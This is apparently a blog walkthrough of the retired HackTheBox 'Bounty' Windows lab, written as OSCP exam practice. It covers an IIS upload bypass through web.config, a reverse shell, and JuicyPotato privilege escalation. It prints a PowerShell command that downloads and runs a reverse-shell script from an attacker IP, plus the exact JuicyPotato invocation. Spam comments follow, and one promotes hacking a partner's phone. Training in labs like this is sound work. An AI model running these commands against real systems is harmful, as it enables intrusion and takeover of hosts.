OSCP PREPROTİONS – HTB Bounty

Bounty machine is a deliberately vulnerable machine with Windows operating system among retired machines and it is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full port scan

As a result of the network scan, we found that port “80/tcp http Microsoft IIS httpd 7.5” is open.
We provide enumeration over this port.

We did not find any information on the web interface or in the source code. We are scanning with gobuster to detect hidden files and directories.

Here we provided file and directory scanning /aspnet_client /transfer.aspx /uploadedfiles detection
uploadedfiles/ and /aspnet_client no permission

/transfer.aspx we are going

We tried to upload a file here and it didn’t allow aspx file extension

Accepted adding png

Let’s go see if we can access the file

We were able to access the file we added
Now let’s intervene with burpsuite to see which files it accepts here and check if there is a bypass method. If we can somehow find a way to upload a file containing ASPX code to the web server, we can run the code by calling the file from the uploadedfiles directory.
I have tested ASP and ASPX extensions but both give me an “invalid file” error.
In IIS servers, .config files are important. When I tried this here it accepted it so we are looking for the .config revershell file.

We download and modify this code.

Then we create the Invoke-PowerShellTcp.ps1 web serivis that will load the target and try to listen with nc.

File uploaded successfully. Said I listen to the destination port with nc before going to the web.config file

This way we got our shell from the bounty\merlin user from the target
Here we see that the desktop directory is empty, we check for hidden files using the attrib command and we see the user flag

After getting the user flag, we tried to access the administrato user and we could not access it because we did not have authorization here.
We provide local enumeration to access ro authorizations.

Here we see that both the kernel is old and SeImpersonatePrivilege is enabled. Here we think that we will use Rotten Potato, we go and download it from github
Users running the SQL server service or IIS service usually have these privileges enabled by design. This privilege is designed to allow a service to impersonate other users on the system. Juicy Potato takes advantage of the way Microsoft handles tokens to elevate local privileges to SYSTEM.
https://github.com/ohpe/juicy-potato/releases/tag/v0.1
After doanloading JuicyPotato.exe from github, we transfer it to the target machine.

Juicypotato.exe requires 3 mandatory parameters to be used.
We will focus on the -p part, which should give us a revershell. Here I will create a file called shell.bat which should give us a revershell so you should download /Invoke-PowerShellTcp.ps1 and use it.
powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://10.10.14.19:8000/Invoke-PowerShellTcp.ps1’)”

We send this bat file to the target machine.

Now that we have passed the shell.bat file, it is time to use JuicyPotato.exe to give us the shell
.\JuicyPotato.exe -t * -p shell.bat -l 4444 -c ‘{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}’
We will use the command -t to cover all the processes, in this way -p to run shellbat, -l to run locally, and -c to write the Windows Server 2008 R2 Enterprise CLID value.
We can access the CLID value from https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise.

Here, before running this command, we start the web server on our local machine so that invoke can be downloaded and run, and we listen with nc

After running the command we get shell from nt authority\system user.

And that’s how we got the root flag.

Comments

  1. Deanndra

    When I initially left a comment I appear to have
    clicked the -Notify me when new comments are added- checkbox and now whenever a comment is added I get four emails with the exact same comment.
    Is there a way you are able to remove me from that service?
    Appreciate it!

  2. Tyreik

    Woah! I’m really enjoying the template/theme of this blog.
    It’s simple, yet effective. A lot of times it’s challenging to
    get that “perfect balance” between user friendliness and
    appearance. I must say that you’ve done a great job with this.
    Also, the blog loads very quick for me on Internet explorer.
    Excellent Blog!

  3. Rajiv

    I got this web site from my buddy who informed me regarding this web site and now this time I
    am visiting this web site and reading very informative content at this place.

  4. Indiana

    With havin so much content do you ever run into any problems of plagorism or copyright infringement?
    My blog has a lot of completely unique content I’ve either
    created myself or outsourced but it looks like a lot of it is
    popping it up all over the internet without my agreement.

    Do you know any solutions to help reduce content from being stolen? I’d certainly appreciate it.

  5. Keisa

    Good site you have got here.. It’s difficult to find high-quality writing like yours these
    days. I truly appreciate people like you! Take care!!

  6. dobry sklep

    I blog quite often and I really appreciate your content.
    The article has really peaked my interest. I’m going to take a note of your blog and keep checking for new information about
    once a week. I subscribed to your Feed too.
    I saw similar here: Sklep internetowy

  7. sklep online

    Good day! Do you know if they make any plugins to help with Search
    Engine Optimization? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Thanks! You can read similar
    art here: Dobry sklep

  8. Suivre Téléphone

    Lorsque vous oubliez le mot de passe pour verrouiller l’écran, si vous n’entrez pas le mot de passe correct, il sera difficile de le déverrouiller et d’y accéder. Si vous trouvez que votre petit ami / petite amie est suspect, vous avez peut-être pensé à pirater son téléphone Samsung pour obtenir plus de preuves. Ici, nous vous fournirons la meilleure solution pour déchiffrer le mot de passe du téléphone mobile Samsung.

  9. Backlink Building

    Good day! Do you know if they make any plugins to
    assist with Search Engine Optimization? I’m trying to get my website to rank for some targeted keywords but I’m not seeing very good results.
    If you know of any please share. Thanks! You can read similar text here: GSA Verified List

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir